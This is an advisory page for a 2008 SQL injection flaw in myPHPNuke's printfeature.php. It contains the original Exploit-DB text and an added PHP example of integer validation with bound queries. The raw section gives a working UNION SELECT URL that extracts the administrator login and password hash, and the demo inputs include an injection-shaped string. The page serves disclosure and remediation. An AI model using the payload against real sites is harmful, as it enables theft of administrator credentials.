Vendor: myPHPNuke
By: MustLive
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: myPHPNuke
Affected Version From: myPHPNuke < 1.8.8_8rc2
Affected Version To: myPHPNuke < 1.8.8_8rc2
Patch Exists: YES
Related CWE: N/A
CPE: a:myphpnuke:myphpnuke
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

SQL Injection vulnerability in myPHPNuke

There is an SQL injection vulnerability in printfeature.php in myPHPNuke, reachable through the artid parameter. The query given in the advisory returns the login and password hash of the administrator. Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In the last version additional filters were added, so it is not vulnerable to this attack; however, version 1.8.8_8rc2 is still vulnerable to SQL injection, so a limited SQL injection attack (without using spaces and brackets) is possible.

Mitigation:

Upgrade to the latest version of myPHPNuke
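
The description above notes that the character filters added in 1.8.8_8rc2 still leave a limited injection possible, which is the usual outcome of filtering input instead of typing it. The following added example (not myPHPNuke code, and not from the advisory author) shows the structural fix for a numeric parameter such as artid: accept only a positive integer and bind it as a query parameter. The table `features_example`, its columns and the function names are hypothetical, and the demo data is constructed.

```php
<?php
declare(strict_types=1);

// Added illustration, not myPHPNuke source. The table "features_example" and
// its columns are hypothetical; only the parameter name artid is from the page.

/** Accept only a plain positive decimal integer; anything else is rejected. */
function parse_artid(mixed $raw): ?int
{
    // ctype_digit() is true only for non-empty strings made of 0-9, so signs,
    // whitespace, keywords and array-valued parameters all fail here.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Look the article up with a bound parameter, never by string concatenation. */
function fetch_feature(PDO $db, mixed $rawArtid): ?array
{
    $id = parse_artid($rawArtid);
    if ($id === null) {
        return null; // caller should answer with 400 or 404
    }
    $stmt = $db->prepare('SELECT artid, title FROM features_example WHERE artid = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE features_example (artid INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO features_example VALUES (1, 'Hello')");

// Constructed inputs: one valid id, then values that are not plain integers.
foreach (['1', '-1', '1 union select null', '1abc', ['1']] as $input) {
    $result = fetch_feature($db, $input);
    printf("%-24s => %s\n", json_encode($input), $result ? $result['title'] : 'rejected');
}
```

Only the first input returns a row; every other value is rejected before any SQL is built, so the outcome does not depend on which characters a filter happens to block.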

Exploit-DB raw data:

############################################################

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

############################################################

# milw0rm.com [2008-09-02]